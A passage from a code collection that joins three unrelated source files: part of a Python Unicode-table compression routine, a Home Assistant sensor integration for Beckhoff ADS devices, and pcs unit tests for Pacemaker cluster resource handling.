    is printed to sys.stderr. The higher the value, the more info
    you'll get.
    """
    if trace:
        def dump(t1, t2, shift, bytes):
            print("%d+%d bins at shift %d; %d bytes" % (
                len(t1), len(t2), shift, bytes), file=sys.stderr)
        print("Size of original table:", len(t)*getsize(t), \
            "bytes", file=sys.stderr)
    n = len(t)-1    # last valid index
    maxshift = 0    # the most we can shift n and still have something left
    if n > 0:
        while n >> 1:
            n >>= 1
            maxshift += 1
    del n
    bytes = sys.maxsize  # smallest total size so far
    t = tuple(t)    # so slices can be dict keys
    # try every candidate shift and keep the cheapest decomposition
    for shift in range(maxshift + 1):
        t1 = []
        t2 = []
        size = 2**shift
        bincache = {}
        # chop t into bins of 2**shift entries, deduplicating identical
        # bins so t2 only stores each distinct bin once
        for i in range(0, len(t), size):
            bin = t[i:i+size]
            index = bincache.get(bin)
            if index is None:
                index = len(t2)
                bincache[bin] = index
                t2.extend(bin)
            t1.append(index >> shift)
        # determine memory size
        b = len(t1)*getsize(t1) + len(t2)*getsize(t2)
        if trace > 1:
            dump(t1, t2, shift, b)
        if b < bytes:
            best = t1, t2, shift
            bytes = b
    t1, t2, shift = best
    if trace:
        print("Best:", end=' ', file=sys.stderr)
        dump(t1, t2, shift, bytes)
    if __debug__:
        # exhaustively verify that the decomposition is correct
        mask = ~((~0) << shift) # i.e., low-bit mask of shift bits
        for i in range(len(t)):
            assert t[i] == t2[(t1[i >> shift] << shift) + (i & mask)]
    return best
if __name__ == "__main__":
    # regenerate all three generated headers, with tracing enabled
    maketables(1)
| apache-2.0 |
Cinntax/home-assistant | homeassistant/components/ads/sensor.py | 4 | 2436 | """Support for ADS sensors."""
import logging
import voluptuous as vol
from homeassistant.components import ads
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import CONF_NAME, CONF_UNIT_OF_MEASUREMENT
import homeassistant.helpers.config_validation as cv
from . import CONF_ADS_FACTOR, CONF_ADS_TYPE, CONF_ADS_VAR, AdsEntity, STATE_KEY_STATE
# Module-level logger for this platform.
_LOGGER = logging.getLogger(__name__)
# Fallback entity name used when the user does not set CONF_NAME.
DEFAULT_NAME = "ADS sensor"
# Extend the generic sensor platform schema with the ADS-specific options:
# the PLC variable name (required), an optional integer scaling factor, the
# ADS data type (defaults to INT), plus the common name/unit options.
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
    {
        vol.Required(CONF_ADS_VAR): cv.string,
        vol.Optional(CONF_ADS_FACTOR): cv.positive_int,
        vol.Optional(CONF_ADS_TYPE, default=ads.ADSTYPE_INT): vol.In(
            [
                ads.ADSTYPE_INT,
                ads.ADSTYPE_UINT,
                ads.ADSTYPE_BYTE,
                ads.ADSTYPE_DINT,
                ads.ADSTYPE_UDINT,
            ]
        ),
        vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
        vol.Optional(CONF_UNIT_OF_MEASUREMENT, default=""): cv.string,
    }
)
def setup_platform(hass, config, add_entities, discovery_info=None):
    """Set up an ADS sensor device from a YAML platform config."""
    # The shared hub connection is created by the ads component and stored
    # under DATA_ADS in hass.data.
    hub = hass.data.get(ads.DATA_ADS)
    add_entities(
        [
            AdsSensor(
                hub,
                config.get(CONF_ADS_VAR),
                config.get(CONF_ADS_TYPE),
                config.get(CONF_NAME),
                config.get(CONF_UNIT_OF_MEASUREMENT),
                config.get(CONF_ADS_FACTOR),
            )
        ]
    )
class AdsSensor(AdsEntity):
    """Representation of an ADS sensor entity."""
    def __init__(self, ads_hub, ads_var, ads_type, name, unit_of_measurement, factor):
        """Initialize AdsSensor entity.

        :param ads_hub: connection hub to the ADS device (passed to AdsEntity)
        :param ads_var: name of the PLC variable to read
        :param ads_type: one of the ads.ADSTYPE_* constants
        :param name: friendly name of the entity
        :param unit_of_measurement: unit string shown in the UI
        :param factor: optional scaling factor forwarded to the hub on
            registration (may be None)
        """
        super().__init__(ads_hub, name, ads_var)
        self._unit_of_measurement = unit_of_measurement
        self._ads_type = ads_type
        self._factor = factor
    async def async_added_to_hass(self):
        """Register device notification."""
        # Map the configured ADS type to the hub's low-level type and start
        # listening; updates land in self._state_dict[STATE_KEY_STATE]
        # (the state dict is maintained by the AdsEntity base class).
        await self.async_initialize_device(
            self._ads_var,
            self._ads_hub.ADS_TYPEMAP[self._ads_type],
            STATE_KEY_STATE,
            self._factor,
        )
    @property
    def state(self):
        """Return the state of the device."""
        return self._state_dict[STATE_KEY_STATE]
    @property
    def unit_of_measurement(self):
        """Return the unit of measurement."""
        return self._unit_of_measurement
ondrejmular/pcs | pcs_test/tier0/lib/cib/test_resource_common.py | 3 | 45469 | # pylint: disable=too-many-lines
from unittest import TestCase
from lxml import etree
from pcs_test.tools.assertions import (
assert_report_item_list_equal,
assert_xml_equal,
)
from pcs_test.tools import fixture
from pcs_test.tools.xml import etree_to_str
from pcs.common.reports import codes as report_codes
from pcs.lib.cib.resource import common
from pcs.lib.cib.tools import IdProvider
fixture_cib = etree.fromstring(
"""
<cib>
<configuration>
<resources>
<primitive id="A" />
<clone id="B-clone">
<primitive id="B" />
</clone>
<master id="C-master">
<primitive id="C" />
</master>
<group id="D">
<primitive id="D1" />
<primitive id="D2" />
</group>
<clone id="E-clone">
<group id="E">
<primitive id="E1" />
<primitive id="E2" />
</group>
</clone>
<master id="F-master">
<group id="F">
<primitive id="F1" />
<primitive id="F2" />
</group>
</master>
<bundle id="G-bundle" />
<bundle id="H-bundle">
<primitive id="H" />
</bundle>
<group id="I">
<primitive id="I1" />
</group>
<clone id="J-clone">
<group id="J">
<primitive id="J1" />
</group>
</clone>
<master id="K-master">
<group id="K">
<primitive id="K1" />
</group>
</master>
</resources>
</configuration>
</cib>
"""
)
class AreMetaDisabled(TestCase):
    """Tests for common.are_meta_disabled."""

    def test_detect_is_disabled(self):
        # target-role comparison is case insensitive
        for meta in ({"target-role": "Stopped"}, {"target-role": "stopped"}):
            self.assertTrue(common.are_meta_disabled(meta))

    def test_detect_is_not_disabled(self):
        for meta in ({}, {"target-role": "any"}):
            self.assertFalse(common.are_meta_disabled(meta))
class IsCloneDeactivatedByMeta(TestCase):
    """Tests for common.is_clone_deactivated_by_meta."""

    def assert_is_disabled(self, meta_attributes):
        self.assertTrue(common.is_clone_deactivated_by_meta(meta_attributes))

    def assert_is_not_disabled(self, meta_attributes):
        self.assertFalse(common.is_clone_deactivated_by_meta(meta_attributes))

    def test_detect_is_disabled(self):
        # A clone is deactivated by a stop target-role or by clone-max /
        # clone-node-max values which do not evaluate to a positive integer.
        disabled = [
            {"target-role": "Stopped"},
            {"target-role": "stopped"},
            {"clone-max": "0"},
            {"clone-max": "00"},
            {"clone-max": 0},
            {"clone-node-max": "0"},
            {"clone-node-max": "abc1"},
        ]
        for meta in disabled:
            self.assert_is_disabled(meta)

    def test_detect_is_not_disabled(self):
        not_disabled = [
            {},
            {"target-role": "any"},
            {"clone-max": "1"},
            {"clone-max": "01"},
            {"clone-max": 1},
            {"clone-node-max": "1"},
            {"clone-node-max": 1},
            {"clone-node-max": "1abc"},
            {"clone-node-max": "1.1"},
        ]
        for meta in not_disabled:
            self.assert_is_not_disabled(meta)
class FindOneOrMoreResources(TestCase):
    """Tests for common.find_one_resource and common.find_resources."""

    def setUp(self):
        # Flat fixture; the R1x/R2x primitives ensure lookups match whole
        # ids, not prefixes.
        # NOTE(review): the original setUp also built an "additional_search"
        # callback (self.additional_search) which no test in this class ever
        # used; it has been removed as dead code.
        self.cib = etree.fromstring(
            """
            <resources>
                <primitive id="R1" />
                <primitive id="R2" />
                <primitive id="R3" />
                <primitive id="R1x" />
                <primitive id="R2x" />
            </resources>
            """
        )

    def test_one_existing(self):
        resource, report_list = common.find_one_resource(self.cib, "R1")
        self.assertEqual("R1", resource.attrib.get("id"))
        assert_report_item_list_equal(report_list, [])

    def test_one_nonexistant(self):
        # A missing id yields no element plus a "not found" report.
        resource, report_list = common.find_one_resource(self.cib, "R-missing")
        self.assertIsNone(resource)
        assert_report_item_list_equal(
            report_list,
            [
                fixture.report_not_found("R-missing", context_type="resources"),
            ],
        )

    def test_more_existing(self):
        resource_list, report_list = common.find_resources(
            self.cib, ["R1", "R2"]
        )
        self.assertEqual(
            ["R1", "R2"],
            [resource.attrib.get("id") for resource in resource_list],
        )
        assert_report_item_list_equal(report_list, [])

    def test_more_some_missing(self):
        # Existing resources are returned, each missing one is reported.
        resource_list, report_list = common.find_resources(
            self.cib, ["R1", "R2", "RY1", "RY2"]
        )
        self.assertEqual(
            ["R1", "R2"],
            [resource.attrib.get("id") for resource in resource_list],
        )
        assert_report_item_list_equal(
            report_list,
            [
                fixture.report_not_found("RY1", context_type="resources"),
                fixture.report_not_found("RY2", context_type="resources"),
            ],
        )
class FindResourcesMixin:
    """Shared cases for functions mapping a resource element to a collection
    of resource elements.

    Subclasses set _tested_fn (the function under test) and may override
    _iterable_type (e.g. set for order-insensitive comparison); cases which
    depend on the tested function's semantics are left as stubs.
    """

    _iterable_type = list

    def assert_find_resources(self, input_resource_id, output_resource_ids):
        searched = fixture_cib.find(f'.//*[@id="{input_resource_id}"]')
        found_ids = [el.get("id", "") for el in self._tested_fn(searched)]
        self.assertEqual(
            self._iterable_type(output_resource_ids),
            self._iterable_type(found_ids),
        )

    def test_group(self):
        self.assert_find_resources("D", ["D1", "D2"])

    def test_group_in_clone(self):
        self.assert_find_resources("E", ["E1", "E2"])

    def test_group_in_master(self):
        self.assert_find_resources("F", ["F1", "F2"])

    def test_cloned_primitive(self):
        self.assert_find_resources("B-clone", ["B"])

    def test_mastered_primitive(self):
        self.assert_find_resources("C-master", ["C"])

    def test_bundle_empty(self):
        self.assert_find_resources("G-bundle", [])

    def test_bundle_with_primitive(self):
        self.assert_find_resources("H-bundle", ["H"])

    # The remaining cases differ between the tested functions and must be
    # provided by each subclass.
    def test_primitive(self):
        raise NotImplementedError()

    def test_primitive_in_clone(self):
        raise NotImplementedError()

    def test_primitive_in_master(self):
        raise NotImplementedError()

    def test_primitive_in_group(self):
        raise NotImplementedError()

    def test_primitive_in_bundle(self):
        raise NotImplementedError()

    def test_cloned_group(self):
        raise NotImplementedError()

    def test_mastered_group(self):
        raise NotImplementedError()
class FindPrimitives(TestCase, FindResourcesMixin):
    """Tests for common.find_primitives."""

    _tested_fn = staticmethod(common.find_primitives)

    def test_primitive(self):
        self.assert_find_resources("A", ["A"])

    def test_primitive_in_clone(self):
        self.assert_find_resources("B", ["B"])

    def test_primitive_in_master(self):
        self.assert_find_resources("C", ["C"])

    def test_primitive_in_group(self):
        # A primitive in a group resolves to itself.
        for rid in ("D1", "D2", "E1", "E2", "F1", "F2"):
            self.assert_find_resources(rid, [rid])

    def test_primitive_in_bundle(self):
        self.assert_find_resources("H", ["H"])

    def test_cloned_group(self):
        self.assert_find_resources("E-clone", ["E1", "E2"])

    def test_mastered_group(self):
        self.assert_find_resources("F-master", ["F1", "F2"])
class GetAllInnerResources(TestCase, FindResourcesMixin):
    """Tests for common.get_all_inner_resources."""

    _iterable_type = set
    _tested_fn = staticmethod(common.get_all_inner_resources)

    def test_primitive(self):
        self.assert_find_resources("A", set())

    def test_primitive_in_clone(self):
        self.assert_find_resources("B", set())

    def test_primitive_in_master(self):
        self.assert_find_resources("C", set())

    def test_primitive_in_group(self):
        # Primitives have no inner resources regardless of their parent.
        for rid in ("D1", "D2", "E1", "E2", "F1", "F2"):
            self.assert_find_resources(rid, set())

    def test_primitive_in_bundle(self):
        self.assert_find_resources("H", set())

    def test_cloned_group(self):
        self.assert_find_resources("E-clone", {"E", "E1", "E2"})

    def test_mastered_group(self):
        self.assert_find_resources("F-master", {"F", "F1", "F2"})
class GetInnerResources(TestCase, FindResourcesMixin):
    """Tests for common.get_inner_resources (direct children only)."""

    _tested_fn = staticmethod(common.get_inner_resources)

    def test_primitive(self):
        self.assert_find_resources("A", [])

    def test_primitive_in_clone(self):
        self.assert_find_resources("B", [])

    def test_primitive_in_master(self):
        self.assert_find_resources("C", [])

    def test_primitive_in_group(self):
        # Primitives never have inner resources.
        for rid in ("D1", "D2", "E1", "E2", "F1", "F2"):
            self.assert_find_resources(rid, [])

    def test_primitive_in_bundle(self):
        self.assert_find_resources("H", [])

    def test_mastered_group(self):
        self.assert_find_resources("F-master", ["F"])

    def test_cloned_group(self):
        self.assert_find_resources("E-clone", ["E"])
class IsWrapperResource(TestCase):
    """Tests for common.is_wrapper_resource."""

    def assert_is_wrapper(self, res_id, is_wrapper):
        element = fixture_cib.find(f'.//*[@id="{res_id}"]')
        self.assertEqual(is_wrapper, common.is_wrapper_resource(element))

    def test_primitive(self):
        self.assert_is_wrapper("A", False)

    def test_primitive_in_clone(self):
        self.assert_is_wrapper("B", False)

    def test_primitive_in_master(self):
        self.assert_is_wrapper("C", False)

    def test_primitive_in_group(self):
        # A primitive is never a wrapper, whatever contains it.
        for rid in ("D1", "D2", "E1", "E2", "F1", "F2"):
            self.assert_is_wrapper(rid, False)

    def test_primitive_in_bundle(self):
        self.assert_is_wrapper("H", False)

    def test_cloned_group(self):
        self.assert_is_wrapper("E-clone", True)

    def test_mastered_group(self):
        self.assert_is_wrapper("F-master", True)

    def test_group(self):
        self.assert_is_wrapper("D", True)

    def test_group_in_clone(self):
        self.assert_is_wrapper("E", True)

    def test_group_in_master(self):
        self.assert_is_wrapper("F", True)

    def test_cloned_primitive(self):
        self.assert_is_wrapper("B-clone", True)

    def test_mastered_primitive(self):
        self.assert_is_wrapper("C-master", True)

    def test_bundle_empty(self):
        self.assert_is_wrapper("G-bundle", True)

    def test_bundle_with_primitive(self):
        self.assert_is_wrapper("H-bundle", True)
class GetParentResource(TestCase):
    """Tests for common.get_parent_resource."""

    def assert_parent_resource(self, input_resource_id, output_resource_id):
        child = fixture_cib.find(f'.//*[@id="{input_resource_id}"]')
        parent = common.get_parent_resource(child)
        parent_id = None if parent is None else parent.get("id")
        self.assertEqual(output_resource_id, parent_id)

    def test_primitive(self):
        self.assert_parent_resource("A", None)

    def test_primitive_in_clone(self):
        self.assert_parent_resource("B", "B-clone")

    def test_primitive_in_master(self):
        self.assert_parent_resource("C", "C-master")

    def test_primitive_in_group(self):
        # The parent of a grouped primitive is the group itself, even when
        # the group is wrapped in a clone or master.
        for rid, expected_parent in (
            ("D1", "D"),
            ("D2", "D"),
            ("E1", "E"),
            ("E2", "E"),
            ("F1", "F"),
            ("F2", "F"),
        ):
            self.assert_parent_resource(rid, expected_parent)

    def test_primitive_in_bundle(self):
        self.assert_parent_resource("H", "H-bundle")

    def test_cloned_group(self):
        self.assert_parent_resource("E-clone", None)

    def test_mastered_group(self):
        self.assert_parent_resource("F-master", None)

    def test_group(self):
        self.assert_parent_resource("D", None)

    def test_group_in_clone(self):
        self.assert_parent_resource("E", "E-clone")

    def test_group_in_master(self):
        self.assert_parent_resource("F", "F-master")

    def test_cloned_primitive(self):
        self.assert_parent_resource("B-clone", None)

    def test_mastered_primitive(self):
        self.assert_parent_resource("C-master", None)

    def test_bundle_empty(self):
        self.assert_parent_resource("G-bundle", None)

    def test_bundle_with_primitive(self):
        self.assert_parent_resource("H-bundle", None)
class FindResourcesToEnable(TestCase):
    """Tests for common.find_resources_to_enable."""

    def assert_find_resources(self, input_resource_id, output_resource_ids):
        searched = fixture_cib.find(f'.//*[@id="{input_resource_id}"]')
        found_ids = [
            el.get("id", "")
            for el in common.find_resources_to_enable(searched)
        ]
        self.assertEqual(output_resource_ids, found_ids)

    def test_primitive(self):
        self.assert_find_resources("A", ["A"])

    def test_primitive_in_clone(self):
        self.assert_find_resources("B", ["B", "B-clone"])

    def test_primitive_in_master(self):
        self.assert_find_resources("C", ["C", "C-master"])

    def test_primitive_in_group(self):
        # A grouped primitive is enabled on its own.
        for rid in ("D1", "D2", "E1", "E2", "F1", "F2"):
            self.assert_find_resources(rid, [rid])

    def test_primitive_in_bundle(self):
        self.assert_find_resources("H", ["H", "H-bundle"])

    def test_group(self):
        self.assert_find_resources("D", ["D"])

    def test_group_in_clone(self):
        self.assert_find_resources("E", ["E", "E-clone"])

    def test_group_in_master(self):
        self.assert_find_resources("F", ["F", "F-master"])

    def test_cloned_primitive(self):
        self.assert_find_resources("B-clone", ["B-clone", "B"])

    def test_cloned_group(self):
        self.assert_find_resources("E-clone", ["E-clone", "E"])

    def test_mastered_primitive(self):
        self.assert_find_resources("C-master", ["C-master", "C"])

    def test_mastered_group(self):
        self.assert_find_resources("F-master", ["F-master", "F"])

    def test_bundle_empty(self):
        self.assert_find_resources("G-bundle", ["G-bundle"])

    def test_bundle_with_primitive(self):
        self.assert_find_resources("H-bundle", ["H-bundle", "H"])
class Enable(TestCase):
    """Tests for common.enable."""

    def assert_enabled(self, pre, post):
        # Parse "pre", run common.enable on it and verify the result
        # matches "post".
        element = etree.fromstring(pre)
        common.enable(element, IdProvider(element))
        assert_xml_equal(post, etree_to_str(element))

    def test_disabled(self):
        # Enabling drops the target-role nvpair.
        self.assert_enabled(
            """
            <resource>
                <meta_attributes>
                    <nvpair name="target-role" value="something" />
                </meta_attributes>
            </resource>
            """,
            """
            <resource>
                <meta_attributes />
            </resource>
            """,
        )

    def test_enabled(self):
        # Enabling an already enabled resource is a no-op.
        self.assert_enabled(
            """
            <resource>
            </resource>
            """,
            """
            <resource>
            </resource>
            """,
        )

    def test_only_first_meta(self):
        # this captures the current behavior
        # once pcs supports more instance and meta attributes for each resource,
        # this test should be reconsidered
        self.assert_enabled(
            """
            <resource>
                <meta_attributes id="meta1">
                    <nvpair name="target-role" value="something" />
                </meta_attributes>
                <meta_attributes id="meta2">
                    <nvpair name="target-role" value="something" />
                </meta_attributes>
            </resource>
            """,
            """
            <resource>
                <meta_attributes id="meta1" />
                <meta_attributes id="meta2">
                    <nvpair name="target-role" value="something" />
                </meta_attributes>
            </resource>
            """,
        )
class Disable(TestCase):
    """Tests for common.disable."""

    def assert_disabled(self, pre, post):
        # Parse "pre", run common.disable on it and verify the result
        # matches "post".
        element = etree.fromstring(pre)
        common.disable(element, IdProvider(element))
        assert_xml_equal(post, etree_to_str(element))

    def test_disabled(self):
        # Disabling an already disabled resource changes nothing.
        xml = """
            <resource id="R">
                <meta_attributes id="R-meta_attributes">
                    <nvpair id="R-meta_attributes-target-role"
                        name="target-role" value="Stopped" />
                </meta_attributes>
            </resource>
        """
        self.assert_disabled(xml, xml)

    def test_enabled(self):
        # Disabling adds a target-role=Stopped nvpair.
        self.assert_disabled(
            """
            <resource id="R">
            </resource>
            """,
            """
            <resource id="R">
                <meta_attributes id="R-meta_attributes">
                    <nvpair id="R-meta_attributes-target-role"
                        name="target-role" value="Stopped" />
                </meta_attributes>
            </resource>
            """,
        )

    def test_only_first_meta(self):
        # this captures the current behavior
        # once pcs supports more instance and meta attributes for each resource,
        # this test should be reconsidered
        self.assert_disabled(
            """
            <resource id="R">
                <meta_attributes id="R-meta_attributes">
                </meta_attributes>
                <meta_attributes id="R-meta_attributes-2">
                </meta_attributes>
            </resource>
            """,
            """
            <resource id="R">
                <meta_attributes id="R-meta_attributes">
                    <nvpair id="R-meta_attributes-target-role"
                        name="target-role" value="Stopped" />
                </meta_attributes>
                <meta_attributes id="R-meta_attributes-2">
                </meta_attributes>
            </resource>
            """,
        )
class FindResourcesToManage(TestCase):
    """Tests for common.find_resources_to_manage."""

    def assert_find_resources(self, input_resource_id, output_resource_ids):
        searched = fixture_cib.find(f'.//*[@id="{input_resource_id}"]')
        found_ids = [
            el.get("id", "")
            for el in common.find_resources_to_manage(searched)
        ]
        self.assertEqual(output_resource_ids, found_ids)

    def test_primitive(self):
        self.assert_find_resources("A", ["A"])

    def test_primitive_in_clone(self):
        self.assert_find_resources("B", ["B", "B-clone"])

    def test_primitive_in_master(self):
        self.assert_find_resources("C", ["C", "C-master"])

    def test_primitive_in_group(self):
        # Managing a grouped primitive also manages all its ancestors.
        for rid, expected in (
            ("D1", ["D1", "D"]),
            ("D2", ["D2", "D"]),
            ("E1", ["E1", "E-clone", "E"]),
            ("E2", ["E2", "E-clone", "E"]),
            ("F1", ["F1", "F-master", "F"]),
            ("F2", ["F2", "F-master", "F"]),
        ):
            self.assert_find_resources(rid, expected)

    def test_primitive_in_bundle(self):
        self.assert_find_resources("H", ["H", "H-bundle"])

    def test_group(self):
        self.assert_find_resources("D", ["D", "D1", "D2"])

    def test_group_in_clone(self):
        self.assert_find_resources("E", ["E", "E-clone", "E1", "E2"])

    def test_group_in_master(self):
        self.assert_find_resources("F", ["F", "F-master", "F1", "F2"])

    def test_cloned_primitive(self):
        self.assert_find_resources("B-clone", ["B-clone", "B"])

    def test_cloned_group(self):
        self.assert_find_resources("E-clone", ["E-clone", "E", "E1", "E2"])

    def test_mastered_primitive(self):
        self.assert_find_resources("C-master", ["C-master", "C"])

    def test_mastered_group(self):
        self.assert_find_resources("F-master", ["F-master", "F", "F1", "F2"])

    def test_bundle_empty(self):
        self.assert_find_resources("G-bundle", ["G-bundle"])

    def test_bundle_with_primitive(self):
        self.assert_find_resources("H-bundle", ["H-bundle", "H"])
class FindResourcesToUnmanage(TestCase):
    """Tests for common.find_resources_to_unmanage."""

    def assert_find_resources(self, input_resource_id, output_resource_ids):
        searched = fixture_cib.find(f'.//*[@id="{input_resource_id}"]')
        found_ids = [
            el.get("id", "")
            for el in common.find_resources_to_unmanage(searched)
        ]
        self.assertEqual(output_resource_ids, found_ids)

    def test_primitive(self):
        self.assert_find_resources("A", ["A"])

    def test_primitive_in_clone(self):
        self.assert_find_resources("B", ["B"])

    def test_primitive_in_master(self):
        self.assert_find_resources("C", ["C"])

    def test_primitive_in_group(self):
        # Unmanaging a grouped primitive touches only that primitive.
        for rid in ("D1", "D2", "E1", "E2", "F1", "F2"):
            self.assert_find_resources(rid, [rid])

    def test_primitive_in_bundle(self):
        self.assert_find_resources("H", ["H"])

    def test_group(self):
        self.assert_find_resources("D", ["D1", "D2"])

    def test_group_in_clone(self):
        self.assert_find_resources("E", ["E1", "E2"])

    def test_group_in_master(self):
        self.assert_find_resources("F", ["F1", "F2"])

    def test_cloned_primitive(self):
        self.assert_find_resources("B-clone", ["B"])

    def test_cloned_group(self):
        self.assert_find_resources("E-clone", ["E1", "E2"])

    def test_mastered_primitive(self):
        self.assert_find_resources("C-master", ["C"])

    def test_mastered_group(self):
        self.assert_find_resources("F-master", ["F1", "F2"])

    def test_bundle_empty(self):
        self.assert_find_resources("G-bundle", ["G-bundle"])

    def test_bundle_with_primitive(self):
        self.assert_find_resources("H-bundle", ["H-bundle", "H"])
class Manage(TestCase):
    """Tests for common.manage."""

    def assert_managed(self, pre, post):
        # Parse "pre", run common.manage on it and verify the result
        # matches "post".
        element = etree.fromstring(pre)
        common.manage(element, IdProvider(element))
        assert_xml_equal(post, etree_to_str(element))

    def test_unmanaged(self):
        # Managing drops the is-managed nvpair.
        self.assert_managed(
            """
            <resource>
                <meta_attributes>
                    <nvpair name="is-managed" value="something" />
                </meta_attributes>
            </resource>
            """,
            """
            <resource>
                <meta_attributes />
            </resource>
            """,
        )

    def test_managed(self):
        # Managing an already managed resource is a no-op.
        self.assert_managed(
            """
            <resource>
            </resource>
            """,
            """
            <resource>
            </resource>
            """,
        )

    def test_only_first_meta(self):
        # this captures the current behavior
        # once pcs supports more instance and meta attributes for each resource,
        # this test should be reconsidered
        self.assert_managed(
            """
            <resource>
                <meta_attributes id="meta1">
                    <nvpair name="is-managed" value="something" />
                </meta_attributes>
                <meta_attributes id="meta2">
                    <nvpair name="is-managed" value="something" />
                </meta_attributes>
            </resource>
            """,
            """
            <resource>
                <meta_attributes id="meta1" />
                <meta_attributes id="meta2">
                    <nvpair name="is-managed" value="something" />
                </meta_attributes>
            </resource>
            """,
        )
class Unmanage(TestCase):
    """Tests for common.unmanage."""

    def assert_unmanaged(self, pre, post):
        # Parse "pre", run common.unmanage on it and verify the result
        # matches "post".
        element = etree.fromstring(pre)
        common.unmanage(element, IdProvider(element))
        assert_xml_equal(post, etree_to_str(element))

    def test_unmanaged(self):
        # Unmanaging an already unmanaged resource changes nothing.
        xml = """
            <resource id="R">
                <meta_attributes id="R-meta_attributes">
                    <nvpair id="R-meta_attributes-is-managed"
                        name="is-managed" value="false" />
                </meta_attributes>
            </resource>
        """
        self.assert_unmanaged(xml, xml)

    def test_managed(self):
        # Unmanaging adds an is-managed=false nvpair.
        self.assert_unmanaged(
            """
            <resource id="R">
            </resource>
            """,
            """
            <resource id="R">
                <meta_attributes id="R-meta_attributes">
                    <nvpair id="R-meta_attributes-is-managed"
                        name="is-managed" value="false" />
                </meta_attributes>
            </resource>
            """,
        )

    def test_only_first_meta(self):
        # this captures the current behavior
        # once pcs supports more instance and meta attributes for each resource,
        # this test should be reconsidered
        self.assert_unmanaged(
            """
            <resource id="R">
                <meta_attributes id="R-meta_attributes">
                </meta_attributes>
                <meta_attributes id="R-meta_attributes-2">
                </meta_attributes>
            </resource>
            """,
            """
            <resource id="R">
                <meta_attributes id="R-meta_attributes">
                    <nvpair id="R-meta_attributes-is-managed"
                        name="is-managed" value="false" />
                </meta_attributes>
                <meta_attributes id="R-meta_attributes-2">
                </meta_attributes>
            </resource>
            """,
        )
class ValidateMoveBanClearMixin:
    """Shared cases for the move/ban/unmove-unban validators.

    Subclasses provide ``validate`` (the validator under test) and
    ``report_code_bad_master`` (the report code expected when the master
    flag is used with a resource that is not promotable).
    """

    # pylint: disable=too-many-public-methods,line-too-long
    @staticmethod
    def _fixture_clone(promotable=False):
        return etree.fromstring(
            f"""
            <clone id="R-clone">
                <primitive id="R" />
                <meta_attributes>
                    <nvpair name="promotable" value="{'true' if promotable else 'false'}" />
                </meta_attributes>
            </clone>
            """
        )

    @staticmethod
    def _fixture_group_clone(promotable=False):
        return etree.fromstring(
            f"""
            <clone id="G-clone">
                <group id="G">
                    <primitive id="R" />
                </group>
                <meta_attributes>
                    <nvpair name="promotable" value="{'true' if promotable else 'false'}" />
                </meta_attributes>
            </clone>
            """
        )

    @staticmethod
    def _fixture_master():
        return etree.fromstring(
            """
            <master id="R-master">
                <primitive id="R" />
            </master>
            """
        )

    @staticmethod
    def _fixture_group_master():
        return etree.fromstring(
            """
            <master id="G-master">
                <group id="G">
                    <primitive id="R" />
                </group>
            </master>
            """
        )

    def _assert_validate(self, element, master, expected_reports):
        # Run the validator under test and compare the produced reports.
        assert_report_item_list_equal(
            self.validate(element, master), expected_reports
        )

    def _bad_master_error(self, resource_id, promotable_id):
        # The report expected when master=True is used on a resource which
        # is not (part of) a promotable clone.
        return fixture.error(
            self.report_code_bad_master,
            resource_id=resource_id,
            promotable_id=promotable_id,
        )

    def test_master_true_promotable_clone(self):
        self._assert_validate(self._fixture_clone(True), True, [])

    def test_master_false_promotable_clone(self):
        self._assert_validate(self._fixture_clone(True), False, [])

    def test_master_true_clone(self):
        self._assert_validate(
            self._fixture_clone(False),
            True,
            [self._bad_master_error("R-clone", None)],
        )

    def test_master_false_clone(self):
        self._assert_validate(self._fixture_clone(False), False, [])

    def test_master_true_master(self):
        self._assert_validate(self._fixture_master(), True, [])

    def test_master_false_master(self):
        self._assert_validate(self._fixture_master(), False, [])

    def test_master_true_promotable_clone_resource(self):
        element = self._fixture_clone(True)
        self._assert_validate(
            element.find("./primitive"),
            True,
            [self._bad_master_error("R", "R-clone")],
        )

    def test_master_false_promotable_clone_resource(self):
        element = self._fixture_clone(True)
        self._assert_validate(element.find("./primitive"), False, [])

    def test_master_true_promotable_clone_group(self):
        element = self._fixture_group_clone(True)
        self._assert_validate(
            element.find("./group"),
            True,
            [self._bad_master_error("G", "G-clone")],
        )

    def test_master_false_promotable_clone_group(self):
        element = self._fixture_group_clone(True)
        self._assert_validate(element.find("./group"), False, [])

    def test_master_true_promotable_clone_group_resource(self):
        element = self._fixture_group_clone(True)
        self._assert_validate(
            element.find("./group/primitive"),
            True,
            [self._bad_master_error("R", "G-clone")],
        )

    def test_master_false_promotable_clone_group_resource(self):
        element = self._fixture_group_clone(True)
        self._assert_validate(element.find("./group/primitive"), False, [])

    def test_master_true_clone_resource(self):
        element = self._fixture_clone(False)
        self._assert_validate(
            element.find("./primitive"),
            True,
            [self._bad_master_error("R", None)],
        )

    def test_master_false_clone_resource(self):
        element = self._fixture_clone(False)
        self._assert_validate(element.find("./primitive"), False, [])

    def test_master_true_clone_group(self):
        element = self._fixture_group_clone(False)
        self._assert_validate(
            element.find("./group"),
            True,
            [self._bad_master_error("G", None)],
        )

    def test_master_false_clone_group(self):
        element = self._fixture_group_clone(False)
        self._assert_validate(element.find("./group"), False, [])

    def test_master_true_clone_group_resource(self):
        element = self._fixture_group_clone(False)
        self._assert_validate(
            element.find("./group/primitive"),
            True,
            [self._bad_master_error("R", None)],
        )

    def test_master_false_clone_group_resource(self):
        element = self._fixture_group_clone(False)
        self._assert_validate(element.find("./group/primitive"), False, [])

    def test_master_true_master_resource(self):
        element = self._fixture_master()
        self._assert_validate(
            element.find("./primitive"),
            True,
            [self._bad_master_error("R", "R-master")],
        )

    def test_master_true_master_group(self):
        element = self._fixture_group_master()
        self._assert_validate(
            element.find("./group"),
            True,
            [self._bad_master_error("G", "G-master")],
        )

    def test_master_true_master_group_resource(self):
        element = self._fixture_group_master()
        self._assert_validate(
            element.find("./group/primitive"),
            True,
            [self._bad_master_error("R", "G-master")],
        )
class ValidateMove(ValidateMoveBanClearMixin, TestCase):
    """Tests for common.validate_move.

    Overrides the mixin cases where moving differs: clones (and their
    inner resources) and bundles cannot be moved at all, and inner
    resources of promotable clones are rejected even without the master
    flag.
    """

    validate = staticmethod(common.validate_move)
    report_code_bad_master = (
        report_codes.CANNOT_MOVE_RESOURCE_MASTER_RESOURCE_NOT_PROMOTABLE
    )

    @staticmethod
    def _fixture_bundle():
        return etree.fromstring(
            """
            <bundle id="R-bundle">
                <primitive id="R" />
            </bundle>
            """
        )

